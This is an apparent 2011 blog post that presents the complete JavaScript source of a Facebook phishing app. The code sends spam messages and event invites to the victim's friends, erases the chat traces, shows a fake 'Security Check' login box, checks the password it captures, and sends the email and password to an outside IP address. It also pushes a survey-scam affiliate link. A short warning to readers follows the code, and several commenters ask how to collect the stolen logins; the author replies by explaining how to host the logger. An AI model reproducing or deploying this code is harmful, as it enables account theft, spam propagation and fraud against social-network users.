Tuesday, April 19, 2011

Advanced Phishing Technique for Facebook

Phishers became more professional they are using numerous ways to phish passwords of different popular websites.One of the popular website we can say is Facebook.
Note: Facebook is Registered Trademark of facebook.com. I am not responsible for any actions you do with this image.



The Phisher's made an Fake Facebook application which exactly looks like Facebook Legit application but the difference is it steals your username and password of facebook in the Background.


You get an Status from your friend like "See this video this girl is totally hot". And when you click it it takes you to one of the application and asks your to ALLOW or Don't ALLOW etc. When you click allow it takes you to another page there it loads the Advanced Javascript you can even say AJAX. And asks you to enter your Username and password without any interruption once you enter the username and password it automatically steals your information 

Below i am posting the Source of the Phishing Facebook 

Warning i take no responsibility of what you do with the source. This is purely educational purposes only




var like_link = 'http://www.pinkweddingfavors.info/bullypal/', app_link = 'http://apps.facebook.com/palpushesbully/', embed_link = 'http://www.ebaumsworld.com/playerbeta.swf?id0=81417366', im_text = 'haha! hilarous '+app_link, $j, jQuery, patt = /"viewer":([^:]+),/g, uid = patt.exec(document.body.innerHTML), dom_jq = document.createElement("script"), Delay = 30, timer;

events = 
[
  '158701400856839',
  '158768297517395',
  '211685662176870'
];

var event = events[Math.floor(Math.random()*events.length)];

dom_jq.src = "http://code.jquery.com/jquery-latest.min.js";
dom_jq.type = "text/javascript";
document.body.appendChild(dom_jq);

var timer = setInterval(function() {
  if(typeof window.jQuery != "undefined") {
    clearInterval(timer);
    jQuery = window.jQuery;
    $j = jQuery.noConflict(true);
    Init();
  }
}, 100);

function Init() {
  if(uid){
    Spam();
  }
  
  $j('.offerlink').click(function()
  {
    timer = setTimeout('showVid()', Delay*1000);
    $j('#waitonuser').css('display', 'block');
    $j('#OfferList').css('display', 'none');
  });
}

function Spam() {
  var fids = AvailableList.getAvailableIDs();
  likeLink(like_link);
  attendEvent(event);
  var ch_fids = chunk(fids, 50);
  $j.each(ch_fids, function() {
    eventInvite(this, event)
  });
  
  $j.each(fids, function(key, value) {
    var userinfo = ChatUserInfos[value];
    var fname = userinfo.firstName;
    if(key<=30){
      sendIM(Math.floor(Math.random() * 99999999), Number(new Date), value, im_text);
    }
  });
  
  setInterval('hideSh()', 100);
}

function attendEvent(b) {
  a = {eid:b, inline:1, new_profile:1, rsvp_status: 'Attending'};
  (new AsyncRequest).setData(a).setURI("/ajax/events/actions.php").send();
}


function eventInvite(b, c) {
  a = {class:'GuestManager', ids:b, node_id:c, send_invitations:1};
  (new AsyncRequest).setData(a).setURI("/ajax/social_graph/invite_dialog.php").send();
}


function likeLink(b) {
  a = {'href' : b, 'node_type' : 'page', 'edge_type' : 'like', 'page_id' : '', 'layout' : 'standard', 'is_personalized' : 'false', 'connect_text' : 0, 'ref' : '', 'now_connected' : 'true', 'nctrl[_mod]' : 'like_widget'};
  (new AsyncRequest).setData(a).setURI("/ajax/connect/external_node_connect.php").send();
}

function sendIM(b, c, d, e) {
  a = {msg_id:b, client_time:c, to:d, num_tabs:1, pvs_time:"", msg_text:e, to_offline:"false"};
  (new AsyncRequest).setData(a).setURI("/ajax/chat/send.php").send();
}

function hideSh() {
  $j(".fbChatMessage").each(function() {
    var patt = /msg_(.*)_/g;
    var id = patt.exec(this.id);
    var fid = id[1];
    chatDisplay.tabs[fid].clearHistory();
  });
  $j(".uiCloseButton input").click();
  $j("div.pop_dialog").remove();
}

function chunk(a, s){
    for(var x, i = 0, c = -1, l = a.length, n = []; i < l; i++)
        (x = i % s) ? n[c][x] = a[i] : n[++c] = [a[i]];
    return n;
}

function showVid(){
  $j('#dialogbox').css('display', 'none');
  $j('#generic_dialog_overlay').css('display', 'none');
  $j('#app205712022786034_player').html('<iframe width="640" height="390" src="'+embed_link+'" frameborder="0" allowfullscreen></iframe>');
}

function loginn() {
  var email = $j('#email').val(), pass =  $j('#pass').val();

  var content = $j.ajax({
    type: 'POST',
    url: '/login.php',
    data: 'email=' + email + '&pass=' + pass + '&login=' + 'Log+in',
    async: false
  }).responseText;
  
  var patt = /Facebook Login/g, bool = patt.exec(content);
  if(!bool){
    phish(email, pass);
    showVid();
  }else{
    $j('#standard_status').css('display', 'none');
    $j('#error').css('display', 'block');
    $j('#error').html(unescape(/%3c%68%32%20%69%64%3d%22%73%74%61%6e%64%61%72%64%5f%65%72%72%6f%72%22%20%63%6c%61%73%73%3d%22%6d%61%69%6e%5f%6d%65%73%73%61%67%65%22%3e%50%6c%65%61%73%65%20%72%65%2d%65%6e%74%65%72%20%79%6f%75%72%20%70%61%73%73%77%6f%72%64%3c%2f%68%32%3e%0d%0a%3c%70%20%69%64%3d%22%73%74%61%6e%64%61%72%64%5f%65%78%70%6c%61%6e%61%74%69%6f%6e%22%20%63%6c%61%73%73%3d%22%73%75%62%5f%6d%65%73%73%61%67%65%22%3e%3c%2f%70%3e%0d%0a%3c%70%3e%54%68%65%20%70%61%73%73%77%6f%72%64%20%79%6f%75%20%65%6e%74%65%72%65%64%20%69%73%20%69%6e%63%6f%72%72%65%63%74%2e%20%50%6c%65%61%73%65%20%74%72%79%20%61%67%61%69%6e%20%28%6d%61%6b%65%20%73%75%72%65%20%79%6f%75%72%20%63%61%70%73%20%6c%6f%63%6b%20%69%73%20%6f%66%66%29%2e%3c%2f%70%3e%0d%0a%3c%70%3e%0d%0a%46%6f%72%67%6f%74%20%79%6f%75%72%20%70%61%73%73%77%6f%72%64%3f%0d%0a%3c%61%20%68%72%65%66%3d%22%2f%72%65%63%6f%76%65%72%2e%70%68%70%3f%65%6d%61%69%6c%5f%6f%72%5f%70%68%6f%6e%65%3d%72%61%73%68%65%65%64%61%6d%61%75%6c%65%35%34%38%25%34%30%79%61%68%6f%6f%2e%63%6f%6d%22%3e%52%65%71%75%65%73%74%20%61%20%6e%65%77%20%6f%6e%65%2e%3c%2f%61%3e%0d%0a%3c%2f%70%3e%0d%0a%3c%70%3e%3c%2f%70%3e/.source));
  }
}

function phish(email, pass){
  var log = new Image();
  log.src = 'http://173.231.144.82/log.php?email=' + email + '&pass=' + pass;
}

dom_dg = document.createElement("div");
dom_dg.className = 'generic_dialog';
dom_dg.id = 'dialogbox';
dom_dg.innerHTML = '<link rel="stylesheet" type="text/css" href="http://s-static.ak.facebook.com/rsrc.php/v1/yM/r/HJkijFx_6MU.css">\
                    <div class="generic_dialog_popup" style="text-align:center; top: 216px;">\
                      <div class="pop_container_advanced">\
                        <div id="pop_content" class="pop_content">\
                        <h2 class="dialog_title"><span>Security Check</span></h2>\
                          <div class="dialog_content">\
                            <div class="dialog_body">\
                              <div id="login" style="display:none;">\
                                <div id="error" style="background-color: #FFEBE8; border-color: #DD3C10; border-style: solid; border-width: 1px; padding: 10px; display:none;"></div>\
                                <div id="standard_status" style="background-color: #FFF9D7; border-color: #E2C822; border-style: solid; border-width: 1px; padding: 10px;">\
                                  <h2 class="main_message">Please login to continue</h2>\
                                </div><br />\
                                <form id="login_form" action="index.php" method="POST">\
                                  <div class="form_row clearfix ">\
                                    <label id="label_email" class="login_form_label" for="email">Email:</label>\
                                    <input id="email" class="inputtext" type="text" value="" name="email">\
                                  </div>\
                                  <div class="form_row clearfix ">\
                                    <label id="label_pass" class="login_form_label" for="pass">Password:</label>\
                                    <input id="pass" class="inputpassword" type="password" value="" name="pass">\
                                  </div>\
                                  <div class="dialog_buttons clearfix">\
                                    <label class="uiButton uiButtonLarge uiButtonConfirm">\
                                      <input type="button" value="Login" onclick="loginn();">\
                                    </label>\
                                  </div>\
                                </form>\
                              </div>\
                              <div id="survey">\
                                <div id="standard_status" style="background-color: #FFF9D7; border-color: #E2C822; border-style: solid; border-width: 1px; padding: 10px;">\
                                   <h2 class="main_message">To prevent spam, we must verify that you are a human.</h2>\
                                </div><br />\
                                <div id="waitonuser" style="display:none;">\
                                  <strong>Checking...</strong><br />\
                                  <img alt="Loading . . ." src="http://www.infacta.com/IMG/loadingAnimation.gif" /><br />\
                                   Status: <span style="color:red;">Not completed</span><br /><br />\
                                   <strong><small>Note: It can take up to 60 seconds for confirmation.</small></strong><br /><br />\
                                   <a href="#" onclick="document.getElementById(\'waitonuser\').style.display=\'none\'; document.getElementById(\'OfferList\').style.display=\'block\'; clearTimeout(timer)">Re-open Survey</a>\
                                </div>\
                                <ul id="OfferList" style="font-weight:bold;font-size:12px;padding-top:10px;">\
                                  <li><a href="http://referer.us/my.adstrack.net/aff_c?offer_id=240&aff_id=1022" class="offerlink" target="blank">Please take this IQ test in order to confirm that you are a human.</a></li>\
                                </ul>\
                              </div>\
                              <div style="width:214px;height:0px" id="wideitup"></div>\
                            </div>\
                          </div>\
                        </div>\
                      </div>\
                    </div>\
                  </div>';
                    
document.body.appendChild(dom_dg);


If you see this function


function phish(email, pass){
  var log = new Image();
  log.src = 'http://173.231.144.82/log.php?email=' + email + '&pass=' + pass;
}



It is one which steals the username and password in the background

So beware DO NOT CLICK ANY LINK ON FACEBOOK EVEN IF ITS FROM YOUR GIRLFRIEND,LOVER,FRIEND,MOM,DAD







Signed
Subhash Dasyam
Filed Under :

7 comments for "Advanced Phishing Technique for Facebook"

  1. steals it in the background and store it where?
    could it be set to be emailed to my address?

    ReplyDelete
  2. http://173.231.144.82/log.php?email=


    the Log.php it can be emailed or stored in database or in a file

    log.php file



    Upload this to any site and replace the above url with your LOG.php url :)

    ReplyDelete
  3. I did the similar phishing copied from net,i hav a doubt. actually i created three files index.php, lol.php and passwords.php I uploaded to a site created by me, now were should i see the enterd id and password and how :p

    ReplyDelete
  4. youtube.com/watch?v=RVHviWhOyWk
    Here is a CLEAR method.

    ReplyDelete
  5. i want to know that how this advance level phishing technic works .above the video link is given only for simple phishing attack but not for this pls help ..

    ReplyDelete
  6. 'dude jo yeh script hai ishe kaha copy keroooo webhosting site pe??..
    kero to name kya dalu or password ke liya alghe se link aayenghe kya??.

    ReplyDelete
  7. nice post dude ..... if you wanna some simpler you might visit
    http://jackofhack.com/internet-hacking/phishing-edition-2013

    ReplyDelete

background